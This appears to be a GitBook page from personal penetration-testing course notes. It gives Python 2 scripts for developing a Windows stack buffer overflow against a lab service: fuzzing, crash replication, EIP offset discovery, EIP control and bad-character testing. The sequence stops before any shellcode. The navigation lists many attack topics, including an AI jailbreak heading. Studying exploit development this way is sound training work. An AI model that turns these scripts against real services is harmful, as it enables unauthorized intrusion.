๐Ÿฉธ
Pentesting Notes
  • ใŠ™๏ธr3dcl1ff
    • ๐Ÿ”ฌEnumeration
      • FTP 21
      • SSH 22
      • Telnet 23 - 2323
      • SMTP 25
      • DNS 53
      • 80 http
        • /phpbash.php
        • inspecting source | Devtools
        • toolbar that allows to run commands on target
        • Wordpress Enumeration
          • Extra commands
          • WPScan one-liners
          • Plugins & Themes exploitation
            • AdRotate
            • Tsumugi 404.php
            • Twentytwenty (Theme)
            • Woody AD Snippets
            • Activity monitor 2
            • wp.spritz
            • Social Warfare
            • Mail Masta 1.0
            • Twentyfourteen
          • CVE-2020-35489 Contact Form 7
          • one-liners
          • CVE-2023-23488
          • nmap
          • Common directories
          • MoveStore API Auth bypass
        • Drupal
        • Koken CMS
        • Codiad
        • /.git
        • Subrion CMS 4.2.1
        • Fuel CMS
        • phpmyadmin
        • /cgi-bin Shellshock
        • Sar2HTML
        • Cute News
        • Nagios
        • Joomla
        • advanced_component_system
        • webdav
        • OTRS 5.0
        • Apache James
        • Ovidentia
        • Cuppa CMS
        • Phreebooks
        • Elastix 2.2.0
        • ApPHP MicroBlog
        • MongoDB 2.2.3
        • CMS Made Simple 2.2.13
        • Jinja2
        • Webmin
        • robots.txt
        • BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
        • Squid proxy
        • simfony CMS
        • C-Panel Reflected XSS - CVE-2023-294
        • vBulletin <= 5.6.9: Pre-authentication Remote Code Execution
      • 88 Kerberos
      • Pop 110-995
      • RPC 111
      • Ident 113
      • NNTP 119
      • NETBios 137-138
      • SMB-Samba 135-139 445
      • MSRPC 135
      • SNMP 161
      • LDAP - 389,636
      • Modbus 502
      • OpenSSL 1337
      • Ms-SQL 1433
      • Oracle Listener 1521 1522 1529
      • NFS 2049
      • MySql 3306
      • RDP 3389
      • ADB Android Debug Bridge 5555
      • WinRM 5985 5986
      • VNC 5800 5900
      • Redis 6379
      • Unreal IRC 6667
      • Tomcat 8080
      • MongoDB 27017
      • Webapp Enum Methodology
      • IIS
    • ๐ŸงจExploitation (deprecated node)
      • Password cracking
        • common passwords
        • online resources
        • hashID
        • john
        • Hashcat
        • Cewl
        • Cupp
        • Hydra
        • fcrackzip
        • Medusa
        • Bash for password creation | cracking
        • Cracking netcat connection
        • Crunch
        • haklistgen
      • Data wrappers
      • Reverse shells
      • Client side attacks
        • msfvenom hta attack
        • MSOffice macro attack
          • Metasploit Office Macro
        • HTML application attack
      • Log poisoning
      • ๐Ÿ“กWireless attacks
      • DoS Denial of Service
      • Microsoft Exchange Pentesting
    • ๐ŸˆฒPrivesc
      • sudo + GTFObins
        • sudo /bin/bash
        • /bin/rpm
        • /usr/bin/gdb
        • /usr/bin/php7.2
        • sudo -u#-1 /bin/bash
        • jjs
        • /usr/lib/jvm/java-1.8.0-openjdk-1.8.0.242.b08-0.el7_7.x86_64/jre/bin/java
        • /usr/bin/vim
        • /usr/bin/tee
        • /usr/bin/nice
        • /usr/bin/dd
        • nmap
        • /usr/bin/zip
        • /usr/bin/date
        • /usr/bin/base32
        • /usr/sbin/hping3
        • /usr/bin/cpulimit
        • /usr/bin/python
        • /etc/passwd
        • echo /bin/bash to executable file
        • /usr/bin/find
        • sudo_inject
        • /bin/systemctl
        • less
        • /bin/ash
        • awk
        • scp
        • man
        • ftp
        • knife
        • /usr/sbin/iftop
        • /usr/bin/nano
        • ed
        • openssl (read file)
        • tar
        • flock
        • expect
        • socat
        • Perl
        • /usr/bin/env
        • strace
      • Docker privilege escalation
      • Kernel Exploits
        • Compiling - General guidelines
        • Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27)
        • LXD - Alpine
        • Serv-U FTP Server < 15.1.7
        • [CVE-2016-5195] dirtycow 2
        • Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5...)
        • Linux Kernel 2.6.39 "Mempodipper"
        • Samba 2.2.x - Remote buffer overflow
        • Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition (Write Access Method)
        • Full Nelson
        • Exim 4.84-3 - Local Privilege Escalation
        • Clown NewUser|Linux 3.0<3.3.5|
        • fasync_helper|Linux Kernel <2.6.28
        • NFS no_root_squash/no_all_squash
      • 'Nix manual enumeration
      • File transfers
        • Windows file transfers
          • Certutil
          • VBScript
          • Powershell
          • pyftpdlib
          • impacket
          • exe2hex
          • php exfil | Win --> Kali
          • http transfers
        • 'Nix file transfers
      • Windows enumeration
        • Automated scripts
      • Wordpress privesc
      • OpenSSL privesc
      • Privesc scripts | resources
        • Linux Exploit suggester
        • Vulmap
      • vi
    • ๐Ÿ–ฅ๏ธCLI-Fu
      • Moving around
      • mkdir
      • find sort grep uniq awk
      • head tail sed cut
      • tar-zip
      • Fucking Vim
      • 'Nix | Windows CLI comparison
    • ๐ŸŽฏOSINT
      • ๐Ÿ“งEmail OSINT
        • HaveIbeenPWND
        • TheHarvester
        • O365
        • Suspicious Email analysis
          • Websites
        • H8mail
      • Recon-NG
      • ๐Ÿฅ‹Shodan
        • Ransomware search
        • Shodan Galore
        • Assorted queries (short)
        • Mindmap
        • โ›“๏ธCompound commands
        • Assorted tricks for BBP
      • ๐Ÿ•ธ๏ธSpiderfoot
      • Metagoofil
      • Websites
        • Fofa
      • โ„น๏ธFavicon OSINT
      • Username Enum
        • Nexfil
        • Blackbird
        • Sherlock
        • DetectDee
      • Greynoise
      • ๐Ÿ—ฃ๏ธChatGPT Jailbreaks
      • Postman
        • Postmaniac
        • Porch-Pirate
      • Google dorks
        • Basic Dorks
        • Dorks -Bug bounty edition-
        • Extra dorks
        • Automated tools
          • ๐ŸšShell script for automated dorking
          • GooFuzz
          • go-dork
      • SOCMINT
        • U-Scrapper
        • Telegram OSINT
        • one-plus OSINT
      • Censys
      • โ˜Ž๏ธPhone OSINT
    • ๐Ÿ› ๏ธTools
      • netcat
      • ncat
      • Socat
      • ๐Ÿ’ปAssorted scripts
        • Buffer Overflows
          • Windows Bof
        • Mitigation script CVE 2022-41040
      • Bash Voodoo
      • ๐ŸฆˆWireshark
      • Aircrack-ng
      • TCPDump
      • cloudflare Bypass
      • Shuffledns
    • ๐ŸŸฆActive Directory
      • Enumeration
        • ADRecon.ps1
        • Power View
        • Manual Enum basics
        • ๐ŸฆฎBloodhound
      • Mimikatz
      • ๐Ÿบkerberoasting
      • Pass-the-hash
    • ๐Ÿช“Sysadmin
      • Pimp my kali
      • Random commands
    • ๐Ÿ—’๏ธPentesting Checklist(s)
      • ๐ŸขInternal Pentest Checklist
        • Rules of engagement
        • Recon
        • Social Engineering
          • Phishing
            • Evilurl
            • Sendemail
            • urlcrazy
            • Website Cloning
            • Detect Phishing sites in real time
            • Homograph attacks
              • DNSTwist
            • URL Masking
            • Email OSINT
            • Test deliverability before campaign
            • Spoofing with python
            • Deepfake
            • HTML Templates
              • Win10 simple html
    • ๐Ÿ•ท๏ธWebApp Pentest
      • Vuln scanners
        • Tenable Nessus
        • Sn1per
        • OpenVAS
        • nuclei
        • ๐Ÿ•ท๏ธBlack Widow
        • Cariddi
        • ๐Ÿค–BBOT
      • Attack Surface Recon
        • Subdomain-enum
          • Scilla
          • Amass
          • Sublist3r
          • Assetfinder
          • Subfinder
        • DNS permutations
          • PureDNS
          • TLSx
          • MassDNS
          • AltDNS
          • shuffleDNS
          • DNSValidator
        • Legacy tools
          • Fierce
          • DNS Recon
          • Dig
          • DNSAudit
        • Hakluke
          • Hakrevdns
          • hakip2host
          • Hakoriginfinder
        • ffuf
        • One liners
        • Wordlists and Resolvers
        • IPinfo
        • ๐ŸงพScripts
          • TLD enum Script
          • Bugbounty Subdomain enum script
        • ๐Ÿ‡ณ๐Ÿ‡ดgungnir
        • NMAP
        • Hednsextractor
        • Caduceus
      • Port scanning
        • NMAP
        • Naabu
        • masscan
        • nmapAutomator
        • smap (shodan Nmap)
      • Subdomain Bruteforcing + crawling
        • LogSensor
        • jsubfinder
      • File inclusion
        • Liffy
        • LFISuite
        • CRLFI
        • LFI - Theory & basic commands
        • RFI - Theory & basic commands
        • one liners
        • HTTPX
        • Dorks
      • โชTraversal
        • Path Traversal
          • Windows Directory traversal
          • Linux Directory traversal
        • dotdotPWN
      • Content Discovery
        • Katana
        • gobuster
        • dirb
        • Gospider
        • Hakrawler
        • webpalm
        • OpenDoor
        • Feroxbuster
        • httpx
        • JS File Analysis and Scraping
        • Waymore
        • Waybackurls
        • Urlfinder
      • Fuzzing
        • wfuzz
        • ffuf
        • Fuzzing Wordlists
        • Fuzzuli (fuzz backup files)
        • find hidden directories
        • Headers Fuzzing (headerpwn)
      • Parameters
        • Arjun
        • Paramspider
        • X8
      • Open redirect
        • Oralyzer.py
        • Dom-Red
        • OpenRedireX
        • Dorks
      • HTTP Request Smuggling
        • smuggler
        • http-request smuggler
        • h2csmuggler
      • Server Side Request Forgery
        • SSRFMap
        • ๐Ÿ„โ€โ™‚๏ธSurf
        • one-liners
        • Top parameters
        • Dorks
      • ๐Ÿ’‰SQLi
        • SQLi (Manual testing)
          • Login bypass
          • URL enum
          • Oracle SQLi
          • SQLi to code execution
          • Ghauri
        • SqlMap
        • One-liners
        • CVEs
          • CVE-2023-25157: CVE-2023-25157 - GeoServer SQL Injection
        • Dorks
      • XSS Cross Site Scripting
        • XXS manual testing
        • PWN-XSS
        • ๐ŸฆŠDalfox
        • PrototypePollution to XSS
        • one-liners
        • Gxss
        • XSStrike
        • Embed XSS payload into image file
        • WAF Bypass 2024
          • Extra payloads
        • Knoxss + knoxsnl
        • Dorks
      • Links
        • GAU Get All URLs
        • Waybackurl
      • Git
        • gitjacker
        • github-subdomains
        • GitGot
        • ๐Ÿ—Trufflehog
        • Github-Dorks
        • git-dumper
      • Text manipulation
        • qsreplace (Tomnomnom)
        • anew (Tomnomnom)
        • Jq (JSON parser)
        • Urldedupe
        • Gf
      • CORS
        • Corsy COR misconfigs scanner
        • One-liners
        • CORScanner
      • CSRF Cross Site Request Forgery
        • XSRFProbe
      • Assorted
        • CMSMap
        • Mantra (secrets crawler)
        • CMSeek
        • web-screenshots using nuclei
        • SecretsFinder
      • Screenshots
        • ๐ŸŒŠAquatone
        • gowitness
      • Command Injection
        • Commix
      • SSTI
        • SSTIMap
      • IDOR
      • Bypass 40X
        • 403Jump
        • nomore403
      • Subdomain Takeover
        • NTHIM Now The Host Is Mine
        • Subzy
      • Headers Security
        • Hauditor
        • Header injection (Headi)
        • Manual checks
      • ๐ŸAPI pentesting
        • Swagger Jacker
        • Google Dorks
      • RCE
    • ๐ŸŒฉ๏ธCloud
      • Enum
        • ๐Ÿ‘ฟTenant Hunter (Azure specific)
        • S3scanner
        • Cloud_enum
        • BucketLoot
    • ๐Ÿง Threat Intel
      • ๐ŸŒ‘Darknet + Tor resources
        • deepDarkCTI
        • Awesome darknet
        • ๐Ÿ‘ฟTheDevilsEye
        • Dark Web OSINT tools
        • DarknetEye - Tor Links
        • Ransomware TTPs
        • APTs resources
      • Interactive maps
        • APT map
        • Shodan ICS attack map
        • Global data on ransomware attacks
      • Malware analysis
        • Cuckoo
      • Phishing URL check
    • ๐Ÿ“ŸIoT / IIoT
      • Github Repos
      • Commercial Frameworks
      • Exploitation frameworks
        • Routersploit
        • Genzai
      • Flipper Zero
        • Repos and resources
      • UEFI Pentesting
        • Qiling
        • Resources adn repos
      • Bluetooth
        • Bluing
    • ๐ŸญICS/OT - SCADA
      • Active Enumeration
        • Cisco-Torch
        • Nmap
          • HVAC 80
          • Siemens S7 102
          • DICOM 104
          • ATG 443
          • Modbus - Schneider 502
          • MQTT 1883
          • NiagaraFox 1911
          • PCWorx 1962
          • CSPv4 2222
          • IEC 2404
          • Mitsubishi Electric MELSEC PLC 5006
          • Omron 9600
          • DNP3 20000 (TCP-UDP)
          • Knx-gateway 3671
          • ProConOS 20547
          • Rockwell Automation Allen-Bradley 44818
          • Bacnet 47808
        • OSINT
        • Passwords and creds
          • SCADAPASS
        • Metasploit
      • Passive Enumeration
        • Grassmarlin
        • Siemens Simatic PCS 7 Hardening Tool
        • tshark
      • Hardware / Lab setup
        • ClickPLC Plus
      • Github repos and resources
        • online resources
        • Github repos
    • ๐ŸฉปPrivate Templates
      • CVE-2024-6387
      • CORS Misconfig
      • CVE-2024-34750
      • CVE-2024-6409 Race Condition in OpenSSH 8.7p1,8.8p1
      • Symfony F#ck U
      • CVE-2024-40725
      • SSRF check
      • Gavazzi Automation UWP 3.0
      • Siemens Simatic PLC
      • CVE-2024-7339
      • Frontpage-exposures
      • in-tank IIoT exposure
      • unauth-VNC
      • Rockwell-Allen-Bradley PLC Detect
      • Hipcam IoT Camera Detect
      • CVE-2024-43044
      • Ivanti-CSA-detect
      • CVE-2024-8190 (Ivanti Command Injection)
      • CVE-2024-38812
      • DB-Dump-Detect
      • Linux Fuzz
      • detect-config.ini
      • Laravel-log
    • ๐ŸžBBP
    • ๐Ÿ“ฑMobile
      • All in one Frameworks
        • MobSF
      • Reverse Engineering
        • Apktool
      • Resources
  • Daily Syncs
    • Design Standups
      • September 2021
        • Week 1 (6 - 10 Sept)
  • Weekly Syncs
    • Company Weeklies
      • 1st September 2021
  • Other Regulars
    • Company Weeklies
      • September 14th 2021
Powered by GitBook
On this page
  1. r3dcl1ff
  2. Tools
  3. Assorted scripts
  4. Buffer Overflows

Windows Bof

PWK scripts

#Fuzzer | Edit target as needed

import socket
import sys
from time import sleep

buffer = 'A' * 100

while True:
  try:
    s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
    s.settimeout(2)
    s.connect(('192.168.56.1',9999))
    s.recv(1024)
    
    print '[*] Sending buffer with length: ' + str(len(buffer))
    s.send(buffer + '\r\n')
    s.close()
    sleep(2)
    buffer = buffer + 'A' * 100
    
  except:
    print '[*] Crash occurred at buffer length: ' + str(len(buffer)-100)
    sys.exit()

#Fuzzing directly with python from command line (fuzz adminhelper application)

./adminhelper $(python -c โ€œprint โ€˜Aโ€™*100โ€)

#Replicating the crash

import socket
import sys
from time import sleep

buffer = 'A' * 600

try:
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.settimeout(2)
  s.connect(('192.168.56.1',9999))
  s.recv(1024)
  
  print '[*] Sending buffer.'
  s.send(buffer + '\r\n')
  s.close()
  
except:
  print '[*] Could not connect to target, exiting.'
  sys.exit()

#Find the offset fo the EIP register

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 650
import socket
import sys
from time import sleep

pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av'

buffer = pattern

try:
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.settimeout(2)
  s.connect(('192.168.56.1',9999))
  s.recv(1024)
  
  print '[*] Sending buffer.'
  s.send(buffer + '\r\n')
  s.close()
  
except:
  print '[*] Could not connect to target, exiting.'
  sys.exit()

#pattern offset

/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 650 and -q 35724134

#Controlling EIP

import socket
import sys
from time import sleep

pattern = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av'

# buffer = 'A' * 600
# buffer = pattern

buffer = 'A' * 524 + 'B' * 4  + 'C' * 122 #524 + 4 + 122 = 650

try:
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.settimeout(2)
  s.connect(('192.168.56.1',9999))
  s.recv(1024)
  
  print '[*] Sending buffer.'
  s.send(buffer + '\r\n')
  s.close()
  
except:
  print '[*] Could not connect to target, exiting.'
  sys.exit()

#Stretching systems like spandex | NOP sled Padding with 522 C's

import socket
import sys
from time import sleep

buffer = 'A' * 524 + 'B' * 4  + 'C' * 522 

try:
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.settimeout(2)
  s.connect(('192.168.56.1',9999))
  s.recv(1024)
  
  print '[*] Sending buffer.'
  s.send(buffer + '\r\n')
  s.close()
  
except:
  print '[*] Could not connect to target, exiting.'
  sys.exit()

#Finding Badchars :

"\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f"
"\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f"
"\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f"
"\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f"
"\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f"
"\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f"
"\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f"
"\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f"
"\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f"
"\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf"
"\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf"
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf"
"\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf"
"\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef"
"\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

#Badchars updated script

import socket
import sys
from time import sleep

badchars = (
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff")


buffer = 'A' * 524 + 'B' * 4  + badchars

try:
  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  s.settimeout(2)
  s.connect(('192.168.56.1',9999))
  s.recv(1024)
  
  print '[*] Sending buffer.'
  s.send(buffer + '\r\n')
  s.close()
  
except:
  print '[*] Could not connect to target, exiting.'
  sys.exit()

PreviousBuffer OverflowsNextMitigation script CVE 2022-41040

Last updated 2 years ago

ใŠ™๏ธ
๐Ÿ› ๏ธ
๐Ÿ’ป